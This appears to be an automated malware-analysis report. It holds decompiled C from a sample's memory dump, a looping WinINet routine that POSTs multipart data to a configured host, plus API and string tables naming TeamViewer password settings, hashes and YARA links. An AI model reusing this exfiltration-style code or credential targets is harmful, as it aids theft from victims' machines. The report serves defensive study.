                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E6F335690() {
				char* _t71;
				void* _t82;
				long _t87;
				int _t93;
				void* _t100;
				intOrPtr _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t111;
				CHAR* _t114;
				int _t115;
				long _t116;
				long _t119;
				void* _t122;
				intOrPtr _t146;
				void* _t147;
				void* _t149;
				intOrPtr _t150;
				void* _t151;
				void* _t152;
				int _t153;
				intOrPtr _t154;
				void* _t156;
				void* _t157;

				 *((intOrPtr*)(_t156 + 0x20)) = 0;
				 *(_t156 + 0x1c) = 0;
				_t3 = GetTickCount() + 0x493e0; // 0x493e0
				_t146 = _t3;
				 *((intOrPtr*)(_t156 + 0x38)) = _t146;
				while(1) {
					_t150 =  *((intOrPtr*)(_t156 + 0x40));
					 *(_t156 + 0x18) = 0x842a0000;
					if( *(_t150 + 0xc) != 0) {
						 *(_t156 + 0x18) = 0x84aa3300;
					}
					_t71 = M6F340518; // 0x749bb0
					_t152 = InternetOpenA(_t71, 1, 0, 0, 0);
					 *(_t156 + 0x30) = _t152;
					if(_t152 == 0) {
						L28:
						if(GetTickCount() >= _t146) {
							L32:
							return  *((intOrPtr*)(_t156 + 0x20));
						}
						Sleep(0x1388);
						continue;
					}
					 *((intOrPtr*)(_t156 + 0x20)) = 0x4e20;
					InternetSetOptionA(_t152, 2, _t156 + 0x14, 4);
					InternetSetOptionA(_t152, 5, _t156 + 0x14, 4);
					InternetSetOptionA(_t152, 6, _t156 + 0x14, 4);
					asm("sbb ecx, ecx");
					_t147 = InternetConnectA(_t152,  *(_t150 + 4), ( ~( *(_t150 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
					 *(_t156 + 0x34) = _t147;
					if(_t147 == 0) {
						L26:
						InternetCloseHandle(_t152);
						if( *(_t156 + 0x1c) != 0) {
							goto L32;
						}
						_t146 =  *((intOrPtr*)(_t156 + 0x38));
						goto L28;
					}
					_t82 = HttpOpenRequestA(_t147, "POST",  *(_t150 + 8), "HTTP/1.1", 0, 0,  *(_t156 + 0x18), 0); // executed
					_t122 = _t82;
					if(_t122 == 0) {
						L25:
						InternetCloseHandle(_t147);
						goto L26;
					}
					_t151 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t151 == 0) {
						L24:
						InternetCloseHandle(_t122);
						_t147 =  *(_t156 + 0x34);
						goto L25;
					}
					_t87 = wsprintfA(_t151, "%s", "Connection: close\r\n");
					_t156 = _t156 + 0xc;
					HttpAddRequestHeadersA(_t122, _t151, _t87, 0xa0000000);
					_t153 = 0;
					 *((intOrPtr*)(_t156 + 0x24)) = 0;
					 *((intOrPtr*)(_t156 + 0x28)) = 0;
					 *(_t156 + 0x18) = 0;
					 *(_t156 + 0x30) = GetTickCount();
					 *(_t156 + 0x1c) = RtlRandom(_t156 + 0x2c);
					_t149 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t149 != 0) {
						 *(_t156 + 0x34) = _t149;
						_t153 = wsprintfA(_t149, "----------%lu\r\nContent-Disposition: form-data; name=\"%s\"\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: binary\r\n\r\n",  *(_t156 + 0x14),  *(_t156 + 0x44));
						_t30 = _t153 + 1; // 0x1
						_t114 = _t149 + _t30;
						 *(_t156 + 0x44) = _t114;
						_t115 = wsprintfA(_t114, "----------%lu--\r\n\r\n",  *((intOrPtr*)(_t156 + 0x24)));
						_t133 =  *((intOrPtr*)(_t156 + 0x5c));
						 *(_t156 + 0x34) = _t115;
						_t116 = wsprintfA(_t151, "Content-Length: %lu\r\n",  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x5c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x5c)) + 0x20)) +  *((intOrPtr*)(_t133 + 0x18)) + _t115 + _t153);
						_t157 = _t156 + 0x28;
						HttpAddRequestHeadersA(_t122, _t151, _t116, 0xa0000000);
						_t119 = wsprintfA(_t151, "Content-Type: multipart/form-data; boundary=--------%lu\r\n",  *((intOrPtr*)(_t157 + 0x14)));
						_t156 = _t157 + 0xc;
						HttpAddRequestHeadersA(_t122, _t151, _t119, 0xa0000000);
					}
					_t93 = HttpSendRequestExA(_t122, 0, 0, 0, 0); // executed
					if(_t93 == 0) {
						if(GetLastError() == 0x2f7d) {
							 *( *((intOrPtr*)(_t156 + 0x40)) + 0xc) = 0;
						}
						L21:
						if(_t149 != 0) {
							HeapFree(GetProcessHeap(), 0, _t149);
						}
						HeapFree(GetProcessHeap(), 0, _t151);
						_t152 =  *(_t156 + 0x30);
						goto L24;
					}
					 *((intOrPtr*)(_t156 + 0x20)) = _t153;
					_t100 = E6F3354E0(_t122,  *((intOrPtr*)(_t156 + 0x24)), _t156 + 0x14);
					_t156 = _t156 + 0xc;
					_t154 =  *((intOrPtr*)(_t156 + 0x40));
					if(_t100 != _t153) {
						L19:
						HttpEndRequestA(_t122, 0, 0, 0);
						if( *(_t156 + 0x1c) != 0) {
							_t102 = E6F335540(_t122, _t154 + 0x2c);
							_t156 = _t156 + 8;
							 *((intOrPtr*)(_t156 + 0x20)) = _t102;
						}
						goto L21;
					}
					_t103 = _t154 + 0x18;
					if( *((intOrPtr*)(_t154 + 0x18)) == 0) {
						L13:
						_t104 = _t154 + 0x20;
						if( *((intOrPtr*)(_t154 + 0x20)) == 0) {
							L15:
							_t105 = _t154 + 0x28;
							if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
								L17:
								 *(_t156 + 0x30) =  *(_t156 + 0x18);
								_t107 = E6F3354E0(_t122,  *((intOrPtr*)(_t156 + 0x28)), _t156 + 0x24);
								_t156 = _t156 + 0xc;
								if(_t107 ==  *(_t156 + 0x18)) {
									 *(_t156 + 0x1c) = 1;
								}
								goto L19;
							}
							_t108 = E6F3354E0(_t122,  *((intOrPtr*)(_t154 + 0x24)), _t105);
							_t156 = _t156 + 0xc;
							if(_t108 !=  *((intOrPtr*)(_t154 + 0x28))) {
								goto L19;
							}
							goto L17;
						}
						_t109 = E6F3354E0(_t122,  *((intOrPtr*)(_t154 + 0x1c)), _t104);
						_t156 = _t156 + 0xc;
						if(_t109 !=  *((intOrPtr*)(_t154 + 0x20))) {
							goto L19;
						}
						goto L15;
					}
					_t111 = E6F3354E0(_t122,  *((intOrPtr*)(_t154 + 0x14)), _t103);
					_t156 = _t156 + 0xc;
					if(_t111 !=  *((intOrPtr*)(_t154 + 0x18))) {
						goto L19;
					}
					goto L13;
				}
			}































                                                                                                                        0x6f335699
                                                                                                                        0x6f33569d
                                                                                                                        0x6f3356a7
                                                                                                                        0x6f3356a7
                                                                                                                        0x6f3356ad
                                                                                                                        0x6f3356c0
                                                                                                                        0x6f3356c0
                                                                                                                        0x6f3356c8
                                                                                                                        0x6f3356d0
                                                                                                                        0x6f3356d2
                                                                                                                        0x6f3356d2
                                                                                                                        0x6f3356da
                                                                                                                        0x6f3356ee
                                                                                                                        0x6f3356f0
                                                                                                                        0x6f3356f6
                                                                                                                        0x6f3359bd
                                                                                                                        0x6f3359c5
                                                                                                                        0x6f3359f1
                                                                                                                        0x6f3359fc
                                                                                                                        0x6f3359fc
                                                                                                                        0x6f3359cc
                                                                                                                        0x00000000
                                                                                                                        0x6f3359cc
                                                                                                                        0x6f33570c
                                                                                                                        0x6f335714
                                                                                                                        0x6f335720
                                                                                                                        0x6f33572c
                                                                                                                        0x6f33573e
                                                                                                                        0x6f335754
                                                                                                                        0x6f335756
                                                                                                                        0x6f33575c
                                                                                                                        0x6f3359ab
                                                                                                                        0x6f3359ac
                                                                                                                        0x6f3359b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3359b9
                                                                                                                        0x00000000
                                                                                                                        0x6f3359b9
                                                                                                                        0x6f33577c
                                                                                                                        0x6f335782
                                                                                                                        0x6f335786
                                                                                                                        0x6f3359a4
                                                                                                                        0x6f3359a5
                                                                                                                        0x00000000
                                                                                                                        0x6f3359a5
                                                                                                                        0x6f3357a2
                                                                                                                        0x6f3357a6
                                                                                                                        0x6f335999
                                                                                                                        0x6f33599a
                                                                                                                        0x6f3359a0
                                                                                                                        0x00000000
                                                                                                                        0x6f3359a0
                                                                                                                        0x6f3357b7
                                                                                                                        0x6f3357bd
                                                                                                                        0x6f3357c8
                                                                                                                        0x6f3357ce
                                                                                                                        0x6f3357d0
                                                                                                                        0x6f3357d4
                                                                                                                        0x6f3357d8
                                                                                                                        0x6f3357e7
                                                                                                                        0x6f3357f8
                                                                                                                        0x6f335805
                                                                                                                        0x6f335809
                                                                                                                        0x6f33581f
                                                                                                                        0x6f33582e
                                                                                                                        0x6f335830
                                                                                                                        0x6f335830
                                                                                                                        0x6f33583a
                                                                                                                        0x6f33583e
                                                                                                                        0x6f335844
                                                                                                                        0x6f33584e
                                                                                                                        0x6f335860
                                                                                                                        0x6f335866
                                                                                                                        0x6f335871
                                                                                                                        0x6f335882
                                                                                                                        0x6f335888
                                                                                                                        0x6f335893
                                                                                                                        0x6f335893
                                                                                                                        0x6f3358a2
                                                                                                                        0x6f3358aa
                                                                                                                        0x6f3359e2
                                                                                                                        0x6f3359e8
                                                                                                                        0x6f3359e8
                                                                                                                        0x6f335971
                                                                                                                        0x6f335973
                                                                                                                        0x6f33597f
                                                                                                                        0x6f33597f
                                                                                                                        0x6f33598f
                                                                                                                        0x6f335995
                                                                                                                        0x00000000
                                                                                                                        0x6f335995
                                                                                                                        0x6f3358bb
                                                                                                                        0x6f3358bf
                                                                                                                        0x6f3358c4
                                                                                                                        0x6f3358c9
                                                                                                                        0x6f3358cd
                                                                                                                        0x6f33594c
                                                                                                                        0x6f335953
                                                                                                                        0x6f33595e
                                                                                                                        0x6f335965
                                                                                                                        0x6f33596a
                                                                                                                        0x6f33596d
                                                                                                                        0x6f33596d
                                                                                                                        0x00000000
                                                                                                                        0x6f33595e
                                                                                                                        0x6f3358d3
                                                                                                                        0x6f3358d6
                                                                                                                        0x6f3358eb
                                                                                                                        0x6f3358ef
                                                                                                                        0x6f3358f2
                                                                                                                        0x6f335907
                                                                                                                        0x6f33590b
                                                                                                                        0x6f33590e
                                                                                                                        0x6f335923
                                                                                                                        0x6f335932
                                                                                                                        0x6f335936
                                                                                                                        0x6f33593b
                                                                                                                        0x6f335942
                                                                                                                        0x6f335944
                                                                                                                        0x6f335944
                                                                                                                        0x00000000
                                                                                                                        0x6f335942
                                                                                                                        0x6f335916
                                                                                                                        0x6f33591b
                                                                                                                        0x6f335921
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335921
                                                                                                                        0x6f3358fa
                                                                                                                        0x6f3358ff
                                                                                                                        0x6f335905
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335905
                                                                                                                        0x6f3358de
                                                                                                                        0x6f3358e3
                                                                                                                        0x6f3358e9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3358e9

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3356A1
                                                                                                                        • InternetOpenA.WININET(00749BB0,00000001,00000000,00000000,00000000), ref: 6F3356E8
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 6F335714
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 6F335720
                                                                                                                        • InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 6F33572C
                                                                                                                        • InternetConnectA.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 6F33574E
                                                                                                                        • HttpOpenRequestA.WININET(00000000,POST,00000001,HTTP/1.1,00000000,00000000,84AA3300,00000000), ref: 6F33577C
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F335793
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3357A0
                                                                                                                        • wsprintfA.USER32 ref: 6F3357B7
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F3357C8
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3357DC
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F3357EB
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F3357FC
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335803
                                                                                                                        • wsprintfA.USER32 ref: 6F335823
                                                                                                                        • wsprintfA.USER32 ref: 6F33583E
                                                                                                                        • wsprintfA.USER32 ref: 6F335860
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335871
                                                                                                                        • wsprintfA.USER32 ref: 6F335882
                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,A0000000), ref: 6F335893
                                                                                                                        • HttpSendRequestExA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6F3358A2
                                                                                                                        • HttpEndRequestA.WININET(00000000,00000000,00000000,00000000), ref: 6F335953
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335978
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33597F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F335988
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F33598F
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F33599A
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359A5
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F3359AC
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3359BD
                                                                                                                        • Sleep.KERNEL32(00001388), ref: 6F3359CC
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6F3374A8,?,6F33DA78), ref: 6F3359D7
                                                                                                                        Strings
                                                                                                                        • ----------%lu--, xrefs: 6F335834
                                                                                                                        • Content-Type: multipart/form-data; boundary=--------%lu, xrefs: 6F33587C
                                                                                                                        • Content-Length: %lu, xrefs: 6F33585A
                                                                                                                        • Connection: close, xrefs: 6F3357AC
                                                                                                                        • POST, xrefs: 6F335776
                                                                                                                        • ----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary, xrefs: 6F335819
                                                                                                                        • HTTP/1.1, xrefs: 6F335770
                                                                                                                        • N, xrefs: 6F33570C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseCountHandleHeadersOptionTick$AllocFreeOpen$ConnectErrorLastRandomSendSleep
                                                                                                                        • String ID: N$----------%luContent-Disposition: form-data; name="%s"Content-Type: text/plainContent-Transfer-Encoding: binary$----------%lu--$Connection: close$Content-Length: %lu$Content-Type: multipart/form-data; boundary=--------%lu$HTTP/1.1$POST
                                                                                                                        • API String ID: 2546452625-2948876467
                                                                                                                        • Opcode ID: 7ea32a9263ea2d0d4593151da6547690d3d73eaba6db73f7a05648d3d57ff80b
                                                                                                                        • Instruction ID: f412cc8f9967b57926f4c2b9cbef0be47c390b5ab26ad302e6127e584bc072b0
                                                                                                                        • Opcode Fuzzy Hash: 7ea32a9263ea2d0d4593151da6547690d3d73eaba6db73f7a05648d3d57ff80b
                                                                                                                        • Instruction Fuzzy Hash: A5A1CFB290438AAFD750DF24CC89F6B7BEDEF89725F00051CFA4596180DB74E8548BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004C26DD, Relevance: 69.1, APIs: 1, Strings: 38, Instructions: 801COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C26EB
                                                                                                                          • Part of subcall function 004D8D4F: __EH_prolog3_catch_GS.LIBCMT ref: 004D8D56
                                                                                                                          • Part of subcall function 004D8D4F: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,0000003C,004D8EFD,?,?), ref: 004D8DAB
                                                                                                                          • Part of subcall function 004D85BC: __EH_prolog3.LIBCMT ref: 004D85C3
                                                                                                                          • Part of subcall function 004D85BC: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,00000008,004C2410), ref: 004D85F6
                                                                                                                          • Part of subcall function 004BD13E: __EH_prolog3.LIBCMT ref: 004BD145
                                                                                                                          • Part of subcall function 004D849A: __EH_prolog3.LIBCMT ref: 004D84A1
                                                                                                                          • Part of subcall function 004D849A: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,?,?,?,?,?,00000008,004C3112,Logging), ref: 004D84D4
                                                                                                                          • Part of subcall function 004D8D4F: _wmemset.LIBCPMT ref: 004D8DEE
                                                                                                                          • Part of subcall function 004D8D4F: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004D8E13
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3QueryValue$H_prolog3_catch__wmemset
                                                                                                                        • String ID: 0.96$CUse$ClientIC$ClientID$CustomRouter$GatewayAllowed$Gatewayname$HttpThreadLimit$IPCConnectPort$IPCListenPort$Init: Load Registry Settings failed [HKEY_SOFTWARE] (.\Global.cpp, 521)$InstallationDirectory$LastKeepalivePerformance$LastRouterPerformance$LicenseType$LimitForGetInsteadPost$ListenHttp$Logging$MaxHttpPacketSizeWithPriorization$MaxPacketSizeWithPriorization$MinimizeToTray$SecurityPasswordAES$Security_Password$Security_Password_Secure$ServerPassword$ServerPasswordAES$ServerPasswordSecure$TcpThreadLimit$TotalSessions$TotalTrafficKilobytes$UseTestMasterKeys$UseTestServer$Version$VpnIP$master.dyngate.com$master.teamviewer.com$tVmore$ecure$useUDP
                                                                                                                        • API String ID: 4186790705-3214323485
                                                                                                                        • Opcode ID: 60d9c34638034813ccc26071b3d6d61201406b0e105d1ca806b055958f7b1c15
                                                                                                                        • Instruction ID: f78076c062f6ca7fd13033a47dd0d286148e18dc9ca1db24686cad4d793e2d17
                                                                                                                        • Opcode Fuzzy Hash: 60d9c34638034813ccc26071b3d6d61201406b0e105d1ca806b055958f7b1c15
                                                                                                                        • Instruction Fuzzy Hash: C562C2709052C8EACF15FB79C926ADE7FA45F21308F1440AEF44127292DB795B08DB6B
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3356B3, Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 258networkmemorysleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E6F3356B3() {
				char* _t65;
				void* _t76;
				long _t81;
				int _t87;
				void* _t94;
				intOrPtr _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				CHAR* _t108;
				int _t109;
				long _t110;
				long _t113;
				void* _t117;
				intOrPtr _t141;
				void* _t143;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				void* _t149;
				int _t151;
				intOrPtr _t152;
				void* _t154;
				void* _t156;

				while(1) {
					_t146 =  *((intOrPtr*)(_t154 + 0x40));
					 *(_t154 + 0x18) = 0x842a0000;
					if( *(_t146 + 0xc) != 0) {
						 *(_t154 + 0x18) = 0x84aa3300;
					}
					_t65 = M6F340518; // 0x749bb0
					_t149 = InternetOpenA(_t65, 1, 0, 0, 0);
					 *(_t154 + 0x30) = _t149;
					if(_t149 == 0) {
						L28:
						if(GetTickCount() >= _t141) {
							L32:
							return  *((intOrPtr*)(_t154 + 0x20));
						}
						Sleep(0x1388);
						continue;
					}
					 *((intOrPtr*)(_t154 + 0x20)) = 0x4e20;
					InternetSetOptionA(_t149, 2, _t154 + 0x14, 4);
					InternetSetOptionA(_t149, 5, _t154 + 0x14, 4);
					InternetSetOptionA(_t149, 6, _t154 + 0x14, 4);
					asm("sbb ecx, ecx");
					_t143 = InternetConnectA(_t149,  *(_t146 + 4), ( ~( *(_t146 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0);
					 *(_t154 + 0x34) = _t143;
					if(_t143 == 0) {
						L26:
						InternetCloseHandle(_t149);
						if( *(_t154 + 0x1c) != 0) {
							goto L32;
						}
						_t141 =  *((intOrPtr*)(_t154 + 0x38));
						goto L28;
					}
					_t76 = HttpOpenRequestA(_t143, "POST",  *(_t146 + 8), "HTTP/1.1", 0, 0,  *(_t154 + 0x18), 0); // executed
					_t117 = _t76;
					if(_t117 == 0) {
						L25:
						InternetCloseHandle(_t143);
						goto L26;
					}
					_t148 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t148 == 0) {
						L24:
						InternetCloseHandle(_t117);
						_t143 =  *(_t154 + 0x34);
						goto L25;
					}
					_t81 = wsprintfA(_t148, "%s", "Connection: close\r\n");
					_t154 = _t154 + 0xc;
					HttpAddRequestHeadersA(_t117, _t148, _t81, 0xa0000000);
					_t151 = 0;
					 *((intOrPtr*)(_t154 + 0x24)) = 0;
					 *((intOrPtr*)(_t154 + 0x28)) = 0;
					 *(_t154 + 0x18) = 0;
					 *(_t154 + 0x30) = GetTickCount();
					 *(_t154 + 0x1c) = RtlRandom(_t154 + 0x2c);
					_t145 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t145 != 0) {
						 *(_t154 + 0x34) = _t145;
						_t151 = wsprintfA(_t145, "----------%lu\r\nContent-Disposition: form-data; name=\"%s\"\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: binary\r\n\r\n",  *(_t154 + 0x14),  *(_t154 + 0x44));
						_t26 = _t151 + 1; // 0x1
						_t108 = _t145 + _t26;
						 *(_t154 + 0x44) = _t108;
						_t109 = wsprintfA(_t108, "----------%lu--\r\n\r\n",  *((intOrPtr*)(_t154 + 0x24)));
						_t128 =  *((intOrPtr*)(_t154 + 0x5c));
						 *(_t154 + 0x34) = _t109;
						_t110 = wsprintfA(_t148, "Content-Length: %lu\r\n",  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x5c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x5c)) + 0x20)) +  *((intOrPtr*)(_t128 + 0x18)) + _t109 + _t151);
						_t156 = _t154 + 0x28;
						HttpAddRequestHeadersA(_t117, _t148, _t110, 0xa0000000);
						_t113 = wsprintfA(_t148, "Content-Type: multipart/form-data; boundary=--------%lu\r\n",  *((intOrPtr*)(_t156 + 0x14)));
						_t154 = _t156 + 0xc;
						HttpAddRequestHeadersA(_t117, _t148, _t113, 0xa0000000);
					}
					_t87 = HttpSendRequestExA(_t117, 0, 0, 0, 0); // executed
					if(_t87 == 0) {
						if(GetLastError() == 0x2f7d) {
							 *( *((intOrPtr*)(_t154 + 0x40)) + 0xc) = 0;
						}
						L21:
						if(_t145 != 0) {
							HeapFree(GetProcessHeap(), 0, _t145);
						}
						HeapFree(GetProcessHeap(), 0, _t148);
						_t149 =  *(_t154 + 0x30);
						goto L24;
					}
					 *((intOrPtr*)(_t154 + 0x20)) = _t151;
					_t94 = E6F3354E0(_t117,  *((intOrPtr*)(_t154 + 0x24)), _t154 + 0x14);
					_t154 = _t154 + 0xc;
					_t152 =  *((intOrPtr*)(_t154 + 0x40));
					if(_t94 != _t151) {
						L19:
						HttpEndRequestA(_t117, 0, 0, 0);
						if( *(_t154 + 0x1c) != 0) {
							_t96 = E6F335540(_t117, _t152 + 0x2c);
							_t154 = _t154 + 8;
							 *((intOrPtr*)(_t154 + 0x20)) = _t96;
						}
						goto L21;
					}
					_t97 = _t152 + 0x18;
					if( *((intOrPtr*)(_t152 + 0x18)) == 0) {
						L13:
						_t98 = _t152 + 0x20;
						if( *((intOrPtr*)(_t152 + 0x20)) == 0) {
							L15:
							_t99 = _t152 + 0x28;
							if( *((intOrPtr*)(_t152 + 0x28)) == 0) {
								L17:
								 *(_t154 + 0x30) =  *(_t154 + 0x18);
								_t101 = E6F3354E0(_t117,  *((intOrPtr*)(_t154 + 0x28)), _t154 + 0x24);
								_t154 = _t154 + 0xc;
								if(_t101 ==  *(_t154 + 0x18)) {
									 *(_t154 + 0x1c) = 1;
								}
								goto L19;
							}
							_t102 = E6F3354E0(_t117,  *((intOrPtr*)(_t152 + 0x24)), _t99);
							_t154 = _t154 + 0xc;
							if(_t102 !=  *((intOrPtr*)(_t152 + 0x28))) {
								goto L19;
							}
							goto L17;
						}
						_t103 = E6F3354E0(_t117,  *((intOrPtr*)(_t152 + 0x1c)), _t98);
						_t154 = _t154 + 0xc;
						if(_t103 !=  *((intOrPtr*)(_t152 + 0x20))) {
							goto L19;
						}
						goto L15;
					}
					_t105 = E6F3354E0(_t117,  *((intOrPtr*)(_t152 + 0x14)), _t97);
					_t154 = _t154 + 0xc;
					if(_t105 !=  *((intOrPtr*)(_t152 + 0x18))) {
						goto L19;
					}
					goto L13;
				}
			}































                                                                                                                        0x6f3356c0
                                                                                                                        0x6f3356c0
                                                                                                                        0x6f3356c8
                                                                                                                        0x6f3356d0
                                                                                                                        0x6f3356d2
                                                                                                                        0x6f3356d2
                                                                                                                        0x6f3356da
                                                                                                                        0x6f3356ee
                                                                                                                        0x6f3356f0
                                                                                                                        0x6f3356f6
                                                                                                                        0x6f3359bd
                                                                                                                        0x6f3359c5
                                                                                                                        0x6f3359f1
                                                                                                                        0x6f3359fc
                                                                                                                        0x6f3359fc
                                                                                                                        0x6f3359cc
                                                                                                                        0x00000000
                                                                                                                        0x6f3359cc
                                                                                                                        0x6f33570c
                                                                                                                        0x6f335714
                                                                                                                        0x6f335720
                                                                                                                        0x6f33572c
                                                                                                                        0x6f33573e
                                                                                                                        0x6f335754
                                                                                                                        0x6f335756
                                                                                                                        0x6f33575c
                                                                                                                        0x6f3359ab
                                                                                                                        0x6f3359ac
                                                                                                                        0x6f3359b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3359b9
                                                                                                                        0x00000000
                                                                                                                        0x6f3359b9
                                                                                                                        0x6f33577c
                                                                                                                        0x6f335782
                                                                                                                        0x6f335786
                                                                                                                        0x6f3359a4
                                                                                                                        0x6f3359a5
                                                                                                                        0x00000000
                                                                                                                        0x6f3359a5
                                                                                                                        0x6f3357a2
                                                                                                                        0x6f3357a6
                                                                                                                        0x6f335999
                                                                                                                        0x6f33599a
                                                                                                                        0x6f3359a0
                                                                                                                        0x00000000
                                                                                                                        0x6f3359a0
                                                                                                                        0x6f3357b7
                                                                                                                        0x6f3357bd
                                                                                                                        0x6f3357c8
                                                                                                                        0x6f3357ce
                                                                                                                        0x6f3357d0
                                                                                                                        0x6f3357d4
                                                                                                                        0x6f3357d8
                                                                                                                        0x6f3357e7
                                                                                                                        0x6f3357f8
                                                                                                                        0x6f335805
                                                                                                                        0x6f335809
                                                                                                                        0x6f33581f
                                                                                                                        0x6f33582e
                                                                                                                        0x6f335830
                                                                                                                        0x6f335830
                                                                                                                        0x6f33583a
                                                                                                                        0x6f33583e
                                                                                                                        0x6f335844
